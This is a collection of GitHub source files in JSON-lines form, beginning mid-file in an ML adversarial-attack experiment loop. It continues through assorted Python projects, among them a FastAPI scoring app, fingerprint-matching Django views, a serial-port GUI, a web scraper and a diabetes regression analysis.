args.train_task_set = args.train_task_set.split(\"+\")\n args.test_task_set = args.test_task_set.split(\"+\")\n args.target_task_set = args.target_task_set.split(\"+\")\n\n train_task_set, target_task_set, test_task_set = args.train_task_set, args.target_task_set, args.test_task_set\n print(len(train_task_set),len(target_task_set),len(test_task_set))\n\n last_failed = False\n for i, (train, 
target, test) in enumerate(zip(train_task_set, target_task_set, test_task_set)):\n print(\"### {i}/{l}: attacking {target} with model trained on {train}\".format(train=train,target=target,i=i,\n l=len(train_task_set)))\n args.train_task_set, args.target_task_set, args.test_task_set = train, target, test\n\n try:\n run(args)\n last_failed = False\n except Exception as e:\n if last_failed:\n print(i,\":\",e)\n raise e\n else:\n last_failed = True\n print(i,\":\",e)\n\n\n else:\n run(args)\n\n\n","repo_name":"yamizi/taskaugment","sub_path":"MTVulnerability/experiments/attacks/adv_attack.py","file_name":"adv_attack.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"1514595491","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/29 8:49 下午\n# @Author : HuangSir\n# @FileName: api.py\n# @Software: PyCharm\n# @Desc:\n\nfrom .routers import risk_router_init\nfrom fastapi import FastAPI\n\n\ndef create_app():\n app = FastAPI(title='风险评分模型',\n description=\"\"\"标准评分卡,集成树模型同时调,入参类别变量务必根据枚举值输入,否则报错. \\n\n 标准评分卡模型参数规范详情: lrData\\n\n 集成树模型参数规范详情: lgbData\n \"\"\",\n version='3.0')\n risk_router_init(app)\n return app\n","repo_name":"OverseasWork/ml_api_template","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10905304727","text":"import copy\nfrom collections import defaultdict\nimport numpy\nfrom dataset import Dataset\n\nclass KelpieDataset(Dataset):\n \"\"\"\n Since Datasets handle the correspondence between textual entities and ids,\n the KelpieDataset has the responsibility to decide the id of the kelpie entity (aka mimic in our paper)\n and to store the train, valid and test samples specific for the original entity and for the kelpie entity\n\n A KelpieDataset is never *loaded* from file: it is always generated from a pre-existing, already loaded Dataset.\n\n Nomenclature used in the KelpieDataset:\n - \"original entity\": the entity to explain the prediction of in the original Dataset;\n - \"clone entity\": a homologous mimic, i.e., a \"fake\" entity\n post-trained with the same training samples as the original entity\n - \"kelpie entity\": a non-homologous mimic, i.e., a \"fake\" entity\n post-trained with slightly different training samples from the original entity.\n (e.g. 
some training samples may have been removed, or added).\n \"\"\"\n\n def __init__(self,\n dataset: Dataset,\n entity_id: int):\n\n super(KelpieDataset, self).__init__(name=dataset.name,\n separator=dataset.separator,\n load=False)\n\n if dataset.num_entities == -1:\n raise Exception(\"The Dataset passed to initialize a KelpieDataset must be already loaded\")\n\n # the KelpieDataset is now basically empty (because load=False was used in the super constructor)\n # so we must manually copy (and sometimes update) all the important attributes from the original loaded Dataset\n self.num_entities = dataset.num_entities + 1 # adding the Kelpie entity to the count\n self.num_relations = dataset.num_relations\n self.num_direct_relations = dataset.num_direct_relations\n\n # copy relevant data structures\n self.to_filter = copy.deepcopy(dataset.to_filter)\n self.train_to_filter = copy.deepcopy(dataset.train_to_filter)\n self.entity_name_2_id = copy.deepcopy(dataset.entity_name_2_id)\n self.entity_id_2_name = copy.deepcopy(dataset.entity_id_2_name)\n self.relation_name_2_id = copy.deepcopy(dataset.relation_name_2_id)\n self.relation_id_2_name = copy.deepcopy(dataset.relation_id_2_name)\n\n # add the kelpie entity\n self.original_entity_id = entity_id\n self.original_entity_name = self.entity_id_2_name[self.original_entity_id]\n self.kelpie_entity_id = dataset.num_entities # add the kelpie entity to the dataset; it is always the last one\n self.kelpie_entity_name = \"kelpie_\" + self.original_entity_name\n self.entity_name_2_id[self.kelpie_entity_name] = self.kelpie_entity_id\n self.entity_id_2_name[self.kelpie_entity_id] = self.kelpie_entity_name\n\n # We do not copy all the triples and samples from the original dataset: the KelpieDataset DOES NOT NEED THEM.\n # The train, valid, and test samples of the KelpieDataset are generated using only those that featured the original entity!\n self.original_train_samples = self._extract_samples_with_entity(dataset.train_samples, self.original_entity_id)\n self.original_valid_samples = self._extract_samples_with_entity(dataset.valid_samples, self.original_entity_id)\n self.original_test_samples = self._extract_samples_with_entity(dataset.test_samples, self.original_entity_id)\n\n self.kelpie_train_samples = Dataset.replace_entity_in_samples(self.original_train_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_valid_samples = Dataset.replace_entity_in_samples(self.original_valid_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_test_samples = Dataset.replace_entity_in_samples(self.original_test_samples, self.original_entity_id, self.kelpie_entity_id)\n\n # update to_filter and train_to_filter data structures\n samples_to_stack = [self.kelpie_train_samples]\n if len(self.kelpie_valid_samples) > 0:\n samples_to_stack.append(self.kelpie_valid_samples)\n if len(self.kelpie_test_samples) > 0:\n samples_to_stack.append(self.kelpie_test_samples)\n all_kelpie_samples = numpy.vstack(samples_to_stack)\n for i in range(all_kelpie_samples.shape[0]):\n (head_id, relation_id, tail_id) = all_kelpie_samples[i]\n self.to_filter[(head_id, relation_id)].append(tail_id)\n self.to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n # if the sample was a training sample, also do the same for the train_to_filter data structure;\n # Also fill the entity_2_degree and relation_2_degree dicts.\n if i < len(self.kelpie_train_samples):\n self.train_to_filter[(head_id, relation_id)].append(tail_id)\n 
self.train_to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n\n # create a map that associates each kelpie train_sample to its index in self.kelpie_train_samples\n # this will be necessary to allow efficient removals and undoing removals\n self.kelpie_train_sample_2_index = {}\n for i in range(len(self.kelpie_train_samples)):\n cur_head, cur_rel, cur_tail = self.kelpie_train_samples[i]\n self.kelpie_train_sample_2_index[(cur_head, cur_rel, cur_tail)] = i\n\n\n # initialize data structures needed in the case of additions and/or removals;\n # these structures are required to undo additions and/or removals\n self.kelpie_train_samples_copy = copy.deepcopy(self.kelpie_train_samples)\n\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n # override\n def add_training_samples(self, samples_to_add: numpy.array):\n \"\"\"\n Add a set of training samples to the training samples of the kelpie entity of this KelpieDataset.\n The samples to add must still feature the original entity id; this method will convert them before addition.\n The KelpieDataset will keep track of the last performed addition so it can be undone if necessary\n calling the undo_last_training_samples_addition method.\n\n :param samples_to_add: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_add:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_added_samples = samples_to_add\n self.last_added_samples_number = len(samples_to_add)\n\n # reset all data structures needed to undo additions. 
We only want to keep track of the *last* addition.\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n kelpie_samples_to_add = Dataset.replace_entity_in_samples(samples_to_add,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n for (cur_head, cur_rel, cur_tail) in kelpie_samples_to_add:\n self.to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.last_added_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_additions[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_additions[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.kelpie_train_samples = numpy.vstack((self.kelpie_train_samples, numpy.array(kelpie_samples_to_add)))\n\n\n def undo_last_training_samples_addition(self):\n \"\"\"\n This method undoes the last addition performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the additions performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n\n if self.last_added_samples_number <= 0:\n raise Exception(\"No addition to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_additions:\n for x in self.last_filter_additions[key]:\n self.to_filter[key].remove(x)\n self.train_to_filter[key].remove(x)\n\n # reset the data structures used to undo additions\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n\n # override\n def remove_training_samples(self, samples_to_remove: numpy.array):\n \"\"\"\n Remove some training samples from the kelpie training samples of this KelpieDataset.\n The samples to remove must still feature the original entity id; this method will convert them before removal.\n The KelpieDataset will keep track of the last performed removal so it can be undone if necessary.\n\n :param samples_to_remove: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_remove:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_removed_samples = samples_to_remove\n self.last_removed_samples_number = len(samples_to_remove)\n\n # reset data structures needed to undo removals. 
We only want to keep track of the *last* removal.\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n kelpie_train_samples_to_remove = Dataset.replace_entity_in_samples(samples=samples_to_remove,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id,\n as_numpy=False)\n\n # update to_filter and train_to_filter\n for (cur_head, cur_rel, cur_tail) in kelpie_train_samples_to_remove:\n self.to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n\n # and also update the data structures required for undoing the removal\n self.last_removed_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_removals[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_removals[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n # get the indices of the samples to remove in the kelpie_train_samples structure\n # and use them to perform the actual removal\n kelpie_train_indices_to_remove = [self.kelpie_train_sample_2_index[x] for x in kelpie_train_samples_to_remove]\n self.kelpie_train_samples = numpy.delete(self.kelpie_train_samples, kelpie_train_indices_to_remove, axis=0)\n\n\n def undo_last_training_samples_removal(self):\n \"\"\"\n This method undoes the last removal performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the removals performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n if self.last_removed_samples_number <= 0:\n raise Exception(\"No removal to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_removals:\n for x in self.last_filter_removals[key]:\n self.to_filter[key].append(x)\n self.train_to_filter[key].append(x)\n\n # reset the data structures used to undo additions\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n def as_kelpie_sample(self, original_sample):\n if not self.original_entity_id in original_sample:\n raise Exception(\"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(original_sample))\n return Dataset.replace_entity_in_sample(sample=original_sample,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n\n def as_original_sample(self, kelpie_sample):\n if not self.kelpie_entity_id in kelpie_sample:\n raise Exception(\n \"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(kelpie_sample))\n return Dataset.replace_entity_in_sample(sample=kelpie_sample,\n old_entity=self.kelpie_entity_id,\n new_entity=self.original_entity_id)\n\n\n ### private utility methods\n @staticmethod\n def _extract_samples_with_entity(samples, entity_id):\n return samples[numpy.where(numpy.logical_or(samples[:, 0] == entity_id, samples[:, 2] == 
entity_id))]","repo_name":"AndRossi/Kelpie","sub_path":"kelpie_dataset.py","file_name":"kelpie_dataset.py","file_ext":"py","file_size_in_byte":14658,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"66"} +{"seq_id":"22908961665","text":"from django.db.models import Q\nfrom drf_spectacular.utils import extend_schema_view, extend_schema\nfrom rest_framework import status\nfrom rest_framework.exceptions import ParseError\nfrom rest_framework.generics import DestroyAPIView, GenericAPIView, \\\n get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom fingerprints.models.enrollment import Finger\nfrom fingerprints.serializers.api.identification import FingerDetailSerializer, \\\n FingerIdentifySerializer, FingerVerifySerializer\nfrom fingerprints.tools.board_sync import BoardSyncService\n\nfrom fingerprints.tools.matcher.identification import FingerMatcher\nfrom persons.models import Person\n\n\n@extend_schema_view(\n post=extend_schema(summary='Identify', tags=['Fingerprints: Identification']),\n)\nclass FingerIdentifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerIdentifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n templates = Finger.get_template_values(status_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not identified.'\n )\n if response == 0:\n qs = Finger.objects.filter(\n iso_fmr_data=templates[template_index.value],\n )\n instance = qs.first()\n serializer = FingerDetailSerializer(instance).data\n return Response(serializer, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n@extend_schema_view(\n post=extend_schema(summary='Verify', tags=['Fingerprints: Identification']),\n)\nclass FingerVerifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerVerifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n board_id_data = request.data.get('board_id')\n templates = Finger.get_template_values(status_data, board_id_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not verified.'\n )\n if response == 0:\n return Response({'detail': 'Verified'}, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n#\n@extend_schema_view(\n delete=extend_schema(summary='Destroy', tags=['Fingerprints: Identification']),\n)\nclass PersonDestroyView(DestroyAPIView):\n permission_classes = [AllowAny]\n queryset = Person.objects.all()\n serializer_class = None\n\n def get_object(self):\n instance = get_object_or_404(\n Person,\n Q(\n status=self.request.data.get('status'),\n board_id=self.request.data.get('board_id'),\n )\n )\n return instance\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n BoardSyncService().destroy_in_board(instance)\n self.perform_destroy(instance)\n return 
Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"mr-Marshanskiy/suprema_fingerprint_matcher","sub_path":"fingerprints/views/identification.py","file_name":"identification.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40351319713","text":"import PyQt5\nimport PyQt5.QtGui\nfrom PyQt5.QtGui import QIcon\nimport pyqtgraph\nfrom pyqtgraph import PlotWidget\nfrom PyQt5 import QtWidgets, uic\nimport sys\nimport serial.tools.list_ports\nimport time\nimport serial\nfrom PyQt5.QtSerialPort import QSerialPort, QSerialPortInfo\nfrom PyQt5.QtCore import QIODevice\n\nimport os ,sys \n\nbasedir = os.path.dirname(__file__)\ntry:\n from ctypes import windll # Only exists on Windows.\n myappid = 'mycompany.myproduct.subproduct.version'\n windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\nexcept ImportError:\n pass\n\n\napp = QtWidgets.QApplication([])\nui = uic.loadUi(os.path.join(basedir,'Casper_v2.ui'))\nui.setWindowTitle(\"Casper Test GUI\")\n\n\nserial = QSerialPort()\nserial.setBaudRate(115200)\nportList = []\nports = QSerialPortInfo().availablePorts()\nfor port in ports:\n portList.append(port.portName())\nui.comboBox_3.addItems(portList)\nui.comboBox_4.addItems(portList)\n\n\nui.widget_1.setLabel('bottom', 'Time (S) ')\nui.widget_1.setLabel('left', 'Temp (C)')\n\n\n\npressure = list()\ngtime = list()\ni = 0\n\ndef onRead():\n global i\n if not serial.canReadLine(): return \n rx = serial.readLine()\n rxs = str(rx, 'utf-8').strip()\n gtime.append(i)\n pressure.append(float(rxs))\n i = i+1\n ui.label_162.setText(rxs)\n ui.widget_1.plot(gtime, pressure)\n \n \n \n \n\ndef Open_Button():\n serial.setPortName(ui.comboBox_3.currentText())\n serial.setPortName(ui.comboBox_4.currentText())\n serial.open(QIODevice.ReadWrite)\ndef Close_Button():\n serial.close()\n\n\n\nserial.readyRead.connect(onRead)\nui.pushButton_6.clicked.connect(Open_Button)\nui.pushButton_5.clicked.connect(Close_Button)\nui.pushButton_8.clicked.connect(Open_Button)\nui.pushButton_7.clicked.connect(Close_Button)\n\n\n\n\nui.setWindowIcon(QIcon(os.path.join(basedir,\"Screenshot_20210202-191737_Video_Player.ico\")))\nui.show()\napp.exec()","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/GroundStation/Casper_v2.py","file_name":"Casper_v2.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41921104320","text":"N = int(input())\nlst = list(map(int, input().split()))\ncost = [0] + lst\n\ndp = [0] * (N+1)\ndp[1] = cost[1]\n\nfor i in range(2, N+1):\n for j in range(0, i+1):\n dp[i] = max(dp[i], cost[i-j]+dp[j])\n\nprint(dp[N])","repo_name":"20SKKUAlgo/BAEKJOON","sub_path":"JooEun/23Feb/0228/p11052.py","file_name":"p11052.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39683842016","text":"from __future__ import annotations\n\nimport argparse\nfrom typing import Sequence\n\nfrom all_repos import autofix_lib\nfrom all_repos.config import Config\n\n\ndef find_repos(_: Config) -> list[str]:\n raise AssertionError('--repos is required')\n\n\ndef main(argv: Sequence[str] | None = None) -> int:\n parser = argparse.ArgumentParser(\n description='Interactively apply a manual change across repos.',\n usage='%(prog)s [options]',\n )\n autofix_lib.add_fixer_args(parser)\n parser.add_argument(\n 
'--branch-name', default='all-repos-manual',\n help='override the autofixer branch name (default `%(default)s`).',\n )\n parser.add_argument(\n '--commit-msg', '--commit-message', required=True,\n help='set the autofixer commit message.',\n )\n args = parser.parse_args(argv)\n\n # force interactive\n args.interactive = True\n\n repos, config, commit, autofix_settings = autofix_lib.from_cli(\n args,\n find_repos=find_repos,\n msg=args.commit_msg,\n branch_name=args.branch_name,\n )\n\n autofix_lib.fix(\n repos,\n apply_fix=autofix_lib.shell,\n config=config,\n commit=commit,\n autofix_settings=autofix_settings,\n )\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"asottile/all-repos","sub_path":"all_repos/manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":483,"dataset":"github-code","pt":"66"} +{"seq_id":"10033341225","text":"# файл, позволяющий работать с config.json\r\nimport json\r\n\r\n\r\nclass Config:\r\n def __init__(self):\r\n self.file = \"config.json\"\r\n configFile = open(self.file, \"r\")\r\n self.config = json.load(configFile)\r\n configFile.close()\r\n\r\n def getConfigVar(self, variable):\r\n if variable in self.config.keys():\r\n return self.config[variable]\r\n\r\n def setConfigVar(self, variable, arg):\r\n if variable in self.config.keys():\r\n self.config[variable] = arg\r\n with open(self.file, 'w') as config:\r\n config.write(json.dumps(self.config, separators=(',\\n', ': ')))\r\n","repo_name":"Dan4oby/Modular-ABot","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4417729569","text":"from typing import Optional\nfrom validation.validate import required_keys_present, values_correct_type\n\n\ndef validate(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals post request\n is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n {\n \"comment\": \"here is a comment\",\n \"patientId\": \"123\",\n \"referralHealthFacilityName\": \"H0000\",\n }\n :return: An error message if request body in invalid in some way. None otherwise.\n \"\"\"\n error_message = None\n\n error_message = required_keys_present(\n request_body,\n [\n \"patientId\",\n \"referralHealthFacilityName\",\n ],\n )\n\n if error_message is not None:\n return error_message\n\n all_fields = [\n \"id\",\n \"dateReferred\",\n \"actionTaken\",\n \"isAssessed\",\n \"isCancelled\",\n \"cancelReason\",\n \"notAttended\",\n \"notAttendReason\",\n \"lastEdited\",\n \"userId\",\n \"comment\",\n \"patientId\",\n \"referralHealthFacilityName\",\n ]\n\n for key in request_body:\n if key not in all_fields:\n return \"The key '\" + key + \"' is not a valid field or is set server-side\"\n\n return error_message\n\n\ndef validate_cancel_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/cancel-status-switch/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. 
None otherwise.\n \"\"\"\n record_keys = [\"isCancelled\", \"cancelReason\"]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"isCancelled\"], bool)\n if error:\n return error\n\n error = values_correct_type(request_body, [\"cancelReason\"], str)\n if error:\n return error\n\n\ndef validate_not_attend_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/not-attend/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\n \"notAttendReason\",\n ]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"notAttendReason\"], str)\n if error:\n return error\n","repo_name":"drbfraser/CRADLE-Platform","sub_path":"server/validation/referrals.py","file_name":"referrals.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"23698578882","text":"import csv\r\nimport threading\r\nimport time\r\nfrom dataclasses import dataclass, astuple, fields\r\n\r\n\r\nimport requests\r\n\r\nBASE_URL = \"https://www.zooplus.de/tierarzt/results\"\r\n\r\nOUTPUT_CSV_PATH = \"doctors.csv\"\r\n\r\n\r\n@dataclass\r\nclass Doctor:\r\n full_name: str\r\n clinic: str\r\n open_time: str\r\n address: str\r\n rating: int\r\n num_of_reviews: int\r\n\r\n\r\nDOCTORS_FIELDS = [field.name for field in fields(Doctor)]\r\n\r\n\r\ndef parse_one_doctor(doctor) -> Doctor:\r\n return Doctor(\r\n full_name=doctor[\"name\"],\r\n clinic=doctor[\"subtitle\"]\r\n if \"subtitle\" in doctor\r\n else \"sorry, we don't have this information\",\r\n open_time=doctor[\"open_time\"],\r\n address=doctor[\"address\"],\r\n rating=doctor[\"avg_review_score\"],\r\n num_of_reviews=doctor[\"count_reviews\"],\r\n )\r\n\r\n\r\ntoken = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/token?debug=authReduxMiddleware-tokenIsExpired\"\r\n).json()[\"token\"]\r\nheaders = {\"authorization\": f\"Bearer {token}\"}\r\n\r\n\r\ndef get_doctors(num):\r\n all_doctors = []\r\n attribute_from = 0\r\n attribute_page = 1\r\n\r\n page = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/results\",\r\n params={\r\n \"animal_99\": True,\r\n \"page\": {attribute_page},\r\n \"from\": {attribute_from},\r\n \"size\": 20,\r\n },\r\n headers=headers,\r\n )\r\n content = page.json()\r\n\r\n attribute_from += 20\r\n all_doctors += [parse_one_doctor(doctor) for doctor in content[\"results\"]]\r\n\r\n with open(OUTPUT_CSV_PATH, \"w\", encoding=\"utf-8\") as file:\r\n writer = csv.writer(file)\r\n writer.writerow(DOCTORS_FIELDS)\r\n writer.writerows([astuple(doctor) for doctor in all_doctors])\r\n\r\n\r\ndef main_threads():\r\n tasks = []\r\n\r\n for num in range(1, 6):\r\n tasks.append(threading.Thread(target=get_doctors, args=(num,)))\r\n tasks[-1].start()\r\n\r\n for task in tasks:\r\n task.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start_time = time.perf_counter()\r\n 
main_threads()\r\n end_time = time.perf_counter()\r\n print(\"Elapsed:\", end_time - start_time)\r\n","repo_name":"anastasia-martyniuk/scraping_zooplus","sub_path":"parse_with_threads.py","file_name":"parse_with_threads.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14067372746","text":"import numpy as np\nfrom mapping import mapping_3p3um_80nm as mapping\nfrom functions import mapping_functions as mf\nimport importlib\nfrom tqdm import tqdm\n\n# %%\nmapping = importlib.reload(mapping)\nmf = importlib.reload(mf)\n\nscission_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/scission_matrix.npy')\nresist_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/resist_matrix.npy')\nchain_lens = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_lens.npy')\nn_chains = len(chain_lens)\n\nchain_tables = []\nprogress_bar = tqdm(total=n_chains, position=0)\n\nfor n in range(n_chains):\n chain_tables.append(\n np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_tables/chain_table_' +\n str(n) + '.npy'))\n progress_bar.update()\n\nresist_shape = mapping.hist_5nm_shape\n\nmf.process_mapping(scission_matrix, resist_matrix, chain_tables)\nzip_length = 1000\nmf.process_depolymerization(resist_matrix, chain_tables, zip_length)\n\n# %%\nfor ct in chain_tables:\n if len(np.where(ct[:, -1] == 10)[0]) > 0:\n break\n","repo_name":"fedorsidorov/MC_simulation","sub_path":"notebooks/tests/test_depolymerization.py","file_name":"test_depolymerization.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19790845471","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('mnnb', views.mnnb, name='mnnb'),\r\n path('post_mnnb', views.post_mnnb, name='post_mnnb'),\r\n \r\n path('lreg', views.lreg, name='lreg'),\r\n path('post_lreg', views.post_lreg, name='post_lreg'),\r\n \r\n path('svm', views.svm, name='svm'),\r\n path('post_svm', views.post_svm, name='post_svm'),\r\n \r\n path('nltk', views.nltk, name='nltk'),\r\n path('post_nltk', views.post_nltk, name='post_nltk'),\r\n]","repo_name":"Siratigui/django-classifiers","sub_path":"spc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8166890105","text":"import numpy as np \nfrom matplotlib import pyplot as plt \n\ndef epsilon(n, alpha=0.05):\n\treturn np.sqrt(1/(2*n) * np.log(2/alpha))\n\ndef pn(n, p=0.4):\n\tX = [1 if np.random.rand()

    =2:\n axes[0][6-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[0][6-indx].set_ylabel(col)\n elif indx <=10 and indx>=6:\n axes[1][10-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[1][10-indx].set_ylabel(col)\nfig.suptitle(\"Boxplots for Diabetes Features\")\nfig.tight_layout()\nfig.subplots_adjust(top=0.88)\nplt.savefig(f'plots/Boxplots_features')\nplt.clf()\n\n#Scatter Plot\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.grid(axis='y', alpha=0.5)\naxes.scatter(diabetes_df[\"tch\"], diabetes_df[\"Target\"], marker=\"1\", color='blue')\naxes.scatter(diabetes_df[\"BP\"], diabetes_df[\"Target\"], marker=\"*\", color='orange')\naxes.scatter(diabetes_df[\"BMI\"], diabetes_df[\"Target\"], marker=\".\", color='green')\naxes.set_title(f'Diabetes comparisons')\naxes.set_ylabel('Diabetes Progression Indicator')\naxes.set_xlabel('Feature Levels')\naxes.legend((\"tch\", \"BP\", \"BMI\"))\nplt.savefig(f'plots/diabetesProgression_to_tch_BP_BMI.png', dpi=300)\nplt.clf()\nplt.close()\n\n#Lasso Regression analysis\n\n#Dummy variable for sex feature\nencoded_sex = pd.get_dummies(diabetes_df['Sex'], drop_first=True)\ndiabetes_df = pd.concat([diabetes_df, encoded_sex], axis=1)\ndiabetes_df.rename(columns = {list(diabetes_df)[11]: \"Encoded Sex\"}, inplace=True)\ndiabetes_df.drop(['Sex'], axis=1, inplace=True)\n\n#Removing outliers based on Z Score\nz = np.abs(stats.zscore(diabetes_df))\ndiabetes_df_o = diabetes_df[(z < 3).all(axis=1)]\nX = diabetes_df_o.loc[:, ['Age', 'BMI', 'BP', 'map', 'tc', 'ldl', 'hdl', 'tch', 'glu', 'Encoded Sex']]\ny = 